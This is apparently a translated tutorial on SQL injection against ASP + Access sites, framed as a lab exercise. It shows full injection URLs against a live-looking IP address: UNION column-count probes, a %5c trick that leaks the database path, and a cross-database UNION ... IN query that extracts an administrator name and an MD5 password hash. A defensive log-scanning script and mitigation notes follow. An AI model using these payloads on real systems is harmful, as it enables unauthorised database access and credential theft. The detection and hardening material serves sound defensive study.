You probably remember MSSQL's cross-database query. In fact, cross-database queries between two databases can also be done in Access. Next I will introduce cross-database queries in Access.
First, let's look at how to query an .mdb file from Access. We can create an empty database and, from it, query the contents of the admin table in the database D:\daosdb\daidalos.mdb. The SQL statement is:
SELECT * FROM admin IN "D:\daosdb\daidalos.mdb"
After the query runs, the system returns the contents of the admin table in the target database:
In real ASP injection, two SELECT statements have to be used at the same time. If you are familiar with PHP + MySQL injection, UNION queries come to mind at once, and we can use them in Access as well. Another advantage of using UNION is that we do not have to guess the data one character at a time: as in MySQL + PHP injection, the contents of a field are exposed directly (a detailed article on this technique has already been written). From the above, it can be seen that a cross-database query requires two conditions:
- The number of fields in the table of the preceding SELECT statement must be known before a UNION can be used.
- The location of the target database, that is, its absolute path, must be known.
Condition 1 can be found manually from the error message, or automatically with a script.
Condition 2 is harder, but we can use the Access "database bursting" trick (forcing the server to reveal the database path through an error message) to obtain it. Some people will say that once we know the database location we can simply download it, but most sites now prevent direct downloads, and some databases are not under the web directory at all.
The first level of the fourth round of the anti-DDoS pro lab consists of two ASP + Access download systems: one is the Rain Point Download System and the other is the Hacker Download System. After testing, the Hacker download system reveals its database path but does not allow the database to be downloaded, and there seems to be no injection. The Rain Point download system, on the other hand, is full of holes: its database path can be forced out, the database can be downloaded directly, and injection is possible too. However, the Rain Point back end is very simple and there is nothing in it worth using. Our goal is the back-end password of the Hacker system. I will show you how to obtain it through a cross-database query via the injection point of the Rain Point system:
We know that list.asp of the Rain Point system is injectable. First we need the number of fields for the UNION, so we submit:
http://219.237.81.46/yddown/list.asp?id=75%20union%20select%201%20from%20userinfo
Return value:
Microsoft JET Database Engine error '80040e14' The number of columns in the two selected tables or queries of a union query do not match. /yddown/list.asp, line 51
The field count is wrong. I wrote a Perl script to guess the field count automatically (see the code below).
When we submit:
http://219.237.81.46/yddown/list.asp?id=75%20union%20select%201,2,3%20from%20userinfo
no error is returned:
Haha! We now have the number of fields, and whatever we place in the position of field 1 is returned in the page.
Now we still need the location of the Hacker system's database. Simply submit:
http://219.237.81.46/dsdown%5cregs.asp
The path is returned successfully:
Microsoft JET Database Engine error '80004005' 'D:\111\db\kljdsld.asa' is not a valid path. Make sure that the path name is spelled correctly and that you are connected to the server on which the file resides. /dsdown/db/user.asp, line 6
(Note: the path obtained this way is not necessarily "complete". The actual path is D:\111\dsdown\db\kljdsld.asa.)
Next we construct the cross-database URL as follows:
http://219.237.81.46/yddown/list.asp?id=75%20union%20select%20admin,3,2%20from%20admin%20in%20"D:\111\dsdown\db\kljdsld.asa"%20where%20id=1
The statement above uses the UNION query to read the admin field of the row with id=1 from the admin table in the database D:\111\db\kljdsld.asa. If it succeeds, the back-end administrator's user name is exposed:
The user name is admin. The password is then extracted the same way:
http://219.237.81.46/yddown/list.asp?id=75%20union%20select%20pws,3,2%20from%20admin%20in%20"D:\111\dsdown\db\kljdsld.asa"%20where%20id=1
We get a 32-character MD5 hash: 77e6cbb3f9468eadb655ae6826357922. The cross-database query succeeded. I only want to demonstrate the cross-database query here; the anti-DDoS service does not come into play :).
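From the defender's side, the three requests shown above (a UNION probe that triggers a JET error, a %5c backslash request that leaks the database path, and a UNION ... IN "drive:\path\file" cross-database read) are all visible in the web server's access log. The following is an added example, not code from the article or from either download system, that scans constructed IIS-style log lines for those three patterns. The log format (date, time, client IP, method, URI stem, URI query, status) and the sample lines are assumptions built from the URLs in the article; the double quotes around the database path are assumed to arrive percent-encoded as %22.

```python
import re
from urllib.parse import unquote_plus

# Constructed W3C-style log lines modelled on the requests in the article.
# Field order assumed: date time client-ip method uri-stem uri-query status
SAMPLE_LOG = """\
2005-01-01 10:00:01 192.0.2.10 GET /yddown/list.asp id=75 200
2005-01-01 10:00:05 192.0.2.10 GET /yddown/list.asp id=75%20union%20select%201%20from%20userinfo 500
2005-01-01 10:00:09 192.0.2.10 GET /dsdown%5cregs.asp - 500
2005-01-01 10:00:14 192.0.2.10 GET /yddown/list.asp id=75%20union%20select%20admin,3,2%20from%20admin%20in%20%22D:%5C111%5Cdsdown%5Cdb%5Ckljdsld.asa%22%20where%20id=1 200
2005-01-01 10:00:20 192.0.2.11 GET /yddown/list.asp id=76 200
"""

# UNION SELECT (optionally UNION ALL SELECT) anywhere in the decoded query.
UNION_RE = re.compile(r"\bunion\b\s+(?:all\s+)?select\b", re.I)
# Access/JET cross-database clause: IN "X:\...\file.mdb" (or .asa/.asp renamed databases).
CROSS_DB_RE = re.compile(r"\bin\s+['\"]([a-z]:\\[^'\"]+\.(?:mdb|asa|asp))['\"]", re.I)
# A percent-encoded backslash in the URI stem: the path-disclosure trick used above.
PATH_DISCLOSURE_RE = re.compile(r"%5c", re.I)


def classify_request(path, query):
    """Return the list of finding tags for a single request (empty if benign)."""
    decoded = unquote_plus(query or "")
    decoded = re.sub(r"\s+", " ", decoded)      # collapse %20/%09 padding variants
    findings = []
    if UNION_RE.search(decoded):
        findings.append("union-select")
    m = CROSS_DB_RE.search(decoded)
    if m:
        findings.append("cross-db:" + m.group(1))
    # The stem is checked raw: IIS maps %5c to a backslash, which is what leaks the path.
    if PATH_DISCLOSURE_RE.search(path):
        findings.append("backslash-in-path")
    return findings


def scan_log(text):
    """Parse the assumed 7-field log format and return (time, client, status, findings) per hit."""
    results = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 7:
            continue                             # skip headers or malformed lines
        _date, time, client, _method, path, query, status = parts
        if query == "-":
            query = ""
        findings = classify_request(path, query)
        if findings:
            results.append((time, client, status, findings))
    return results


if __name__ == "__main__":
    for time, client, status, findings in scan_log(SAMPLE_LOG):
        print(time, client, status, ", ".join(findings))
```

A 500 status paired with a union-select tag is the column-count probing phase (the JET 80040e14 error), and a 500 on a backslash-in-path request is the 80004005 path leak; the cross-db tag with a 200 status is the actual data read. The two mitigations the article's own results point at are returning a generic error page instead of the JET message (which removes both the column-count oracle and the path leak) and passing id as a typed parameter rather than concatenating it into the SQL string.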
Summary
This article introduces two very useful methods. First, in ASP injection we no longer have to guess each character (which is very troublesome with Chinese characters): using UNION to substitute our query for the page's data exposes the data directly, whether it contains Chinese or special characters, in a single step. Second, cross-database queries are very flexible and can bring unexpected gains during a penetration test.